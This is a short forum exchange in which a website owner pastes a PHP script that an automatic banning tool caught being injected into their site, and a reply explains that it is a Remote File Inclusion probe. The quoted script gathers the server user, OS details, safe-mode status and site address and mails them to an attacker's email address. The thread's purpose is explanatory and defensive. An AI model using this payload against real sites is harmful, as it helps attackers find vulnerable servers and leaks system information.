One of the script i bough have a automatic banning tool that ban people when they try to hack my site. But i do not really get what they are trying to do and are they using hacked website to hack me I got this in my admin that this site try to hack me http://www.kingxx.xpg.com.br/tester.txt? PHP: if they delete the code i post it here <?php ini_set("max_execution_time",-1); set_time_limit(0); $user = @get_current_user(); $UNAME = @php_uname(); $SafeMode = @ini_get('safe_mode'); if ($SafeMode == '') { $SafeMode = "OFF"; } else { $SafeMode = " $SafeMode "; } $delet=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']); $dados=("<b>Produto</b> = " . $UNAME . " <i>Seguran?a</i> = " . $SafeMode . " http://" . $delet . " Muito obrigado por comprar o hehe1 com: <u>delet</u>"); $email = "www.vull@gmail.com"; $assunto = "DEUS É PAI"; $email1 = "www.vull@gmail.com"; $headers = "From: <$email>\r\n"; $headers = "MIME-Version: 1.0\r\n"; $headers .= "Content-type: text/html; charset=iso-8859-1\r\n"; if(mail($email1,$assunto,$dados,$headers)){ echo "Isso, ja foi!"; exit(); } else{ echo "N?o foi."; exit(); } ?> PHP: So what are these guys up to
This is a sample exploit check for Remote File Inclusion vulnerability. What this script does is that if your site is vulnerable, this script will send the following information to attackers: get_current_user : This can provide the privilege level of the process of PHP uname : This provide OS information safe_mode: running under safe mode ? Attackers wrote worms to automatic finding. They will get a email about vulnerable site.